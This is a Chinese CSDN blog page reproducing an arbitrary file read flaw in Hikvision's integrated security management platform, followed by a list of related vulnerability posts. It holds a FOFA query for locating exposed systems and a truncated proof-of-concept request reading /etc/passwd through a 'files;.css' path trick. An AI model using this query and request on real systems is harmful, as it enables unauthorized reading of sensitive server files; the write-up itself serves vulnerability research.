【漏洞复现】Hikvision综合安防管理平台任意文件读取漏洞

最新推荐文章于 2025-03-26 08:09:11 发布

晚风不及你ღ

最新推荐文章于 2025-03-26 08:09:11 发布

阅读量2.6k

点赞数 23

文章标签： web安全

本文链接：https://blog.csdn.net/qq_37113223/article/details/135739893

版权

【漏洞复现】专栏收录该内容

150 篇文章

已下架不支持订阅

本文介绍了Hikvision综合安防管理平台的任意文件读取漏洞，详细阐述了漏洞描述和复现过程，并提供了产品主页链接及修复建议。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Nx01 产品简介

Hikvision（海康威视）是一家在中国颇具影响力的安防公司，其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。

Nx02 漏洞描述

Hikvision综合安防管理平台存在任意文件读取漏洞，攻击者可以读取系统任意敏感文件。

Nx03 产品主页

fofa-query: body="/portal/skin/isee/redblack/"

Nx04 漏洞复现

POC：

GET /lm/api/files;.css?link=/etc/passwd HTTP/1.1
Host: {
  {Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+

了解本专栏

已下架不支持订阅

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

晚风不及你ღ

关注关注

23
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

已下架不支持订阅

海康威视视频编码设备接入网关存在任意文件读取漏洞

nnn2188185的博客

04-27

905

海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。杭州海康威视系统技术有限公司流媒体管理服务器存在任意文件读取漏洞。

海康威视综合安防管理平台 orgManage/v1/orgs/download 任意文件读取漏洞复现

0xSec

05-31

1760

海康威视综合安防管理平台 orgManage/v1/orgs/download 接口处存在任意文件读取漏洞，未经身份验证的远程攻击者可利用目录遍历的方式绕过权限认证直接读取后台服务器配置文件等敏感文件，造成信息泄露，使系统处于极不安全的状态。

参与评论您还未登录，请先登录后发表或查看评论

海康威视部分综合安防管理平台产品存在任意文件上传漏洞

Al345__的博客

11-19

2050

海康威视部分综合安防管理平台历史版本由于对上传文件接口校验不足，攻击者可以将恶意文件上传到平台，导致获取服务权限或服务异常。攻击者利用该漏洞上传Webshell，并随后执行任意命令，对主机上相关文件进行加密，加密后缀为locked1。海康威视iVMS集中监控应用管理平台，是以安全防范业务应用为导向，以视频图像应用为基础手段，综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统，构建的多业务应用综合管理平台。（2）建立重要业务数据的定期备份机制，并做好权限隔离，防止勒索软件对备份数据进行加密；

HIKVISION iVMS download.action存在任意文件读取漏洞(DVB-2025-8938)

西米安全

03-11

296

海康威视iVMS（智能视频管理系统）是一款集视频监控、存储、管理、分析于一体的综合管理平台，广泛应用于安防领域。该产品支持多设备接入，提供实时监控、录像回放、智能分析、报警管理等功能，具备高可靠性和易用性，适用于各类场景如智慧城市、交通、金融、教育等，帮助用户实现高效、智能的安全管理。海康威视iVMS download.action存在任意文件读取漏洞，攻击者可以读取服务器任何文件，获取服务器敏感信息。

2025年最新CVE-2017-7921漏洞复现

最新发布

2303_78851087的博客

03-26

844

2025年最新CVE-2017-7921漏洞复现

02_【复现】海康威视综合安防管理平台任意文件读取

fushuang333的博客

12-29

1305

海康威视综合安防管理平台任意文件读取。海康威视综合安防管理平台是一款基于云计算、大数据、人工智能技术构建的智能化综合安防平台。

海康威视iSecure-Center 综合安防管理平台 download 任意文件读取漏洞

WuYSec的博客

06-12

981

海康威视iSecure-Center综合安防管理平台是一款“集成化”、“智能化”的平台，能够接入视频监控、一卡通、停车场、报警检测等系统设备。通过海康威视的集成化综合管理软件平台，可以对接入的视频监控点进行集中管理，实现统一部署、统一配置、统一管理和统一调度。海康威视iSecure-Center综合安防管理平台/orgManage/v1/orgs/download接口存在任意文件读取漏洞，可通过此漏洞读取任意文件。

Hikvision综合安防管理平台files；.css接口存在任意文件读取漏洞附POC软件

nnn2188185的博客

01-23

1006

微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

李火火的安全圈

04-28

9192

综合安防管理平台基于统一软件技术架构理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、配置、管理和调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞，该漏洞可执行系统命令，可获取到目标服务器系统权限以及敏感数据信息。

「漏洞复现」海康威视-综合安防管理平台-files-文件读取

知黑而守白

12-29

312

HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备。综合安防管理平台 files 接口处存在任意文件读取漏洞，攻击者可以读取系统任意敏感文件。

Hikvision综合安防管理平台files；.css接口存在任意文件读取漏洞

weixin_43567873的博客

03-09

369

Hikvision综合安防管理平台files;.css接口存在任意文件读取漏洞

Hikvision:海康威视海康威视流媒体管理服务器任意文件读取

03-28

海康威视海康威视海康威视流媒体管理服务器任意文件读取 #USE python3 CNVD-2021-14544.py ip.txt放置在本脚本目录下

HIKVISION iVMS-8700 综合安防管理平台软件配置指南 V3.0.0.pdf

08-14

HIKVISION iVMS-8700 综合安防管理平台软件配置指南 V3.0.0.pdf

海康威视综合安防管理平台 files 文件读取漏洞

m0_71285176的博客

01-10

2267

HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备。在其某接口处存在任意文件读取漏洞，攻击者可以读取系统任意敏感文件。

海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)

菜鸟学渗透

10-08

2871

海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)

海康威视iVMS-8700综合安防管理平台文件读取漏洞复现

0xSec

12-13

2707

HIKVISION iVMS 综合安防管理平台download接口处存在任意文件读取漏洞，攻击者通过构造token绕过身份认证，读取服务器中的目录信息与敏感文件。使系统处于极不安全的状态。

漏洞复现-海康威视综合安防管理平台信息泄露【附Poc】

zkaqlaoniao的博客

10-25

4804

海康威视（Hikvision）是一家总部位于中国杭州的公司，是全球最大的视频监控产品供应商。除了传统的CCTV摄像机和网络摄像机，海康威视还提供各种相关的安防产品和解决方案。他们的综合安防管理平台为用户提供了一站式的解决方案，包括视频监控、入侵检测、访客管理、停车场管理等。

海康综合安防管理平台远程命令执行漏洞（CNVD-2024-18673）复现

fly夏天的博客

06-19

4657

海康综合安防管理平台远程命令执行漏洞（CNVD-2024-18673）复现

【漏洞复现】Hikvision综合安防管理平台Fastjson命令执行漏洞

晚风不及你

01-23

1451

Hikvision（海康威视）是一家在中国颇具影响力的安防公司，其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。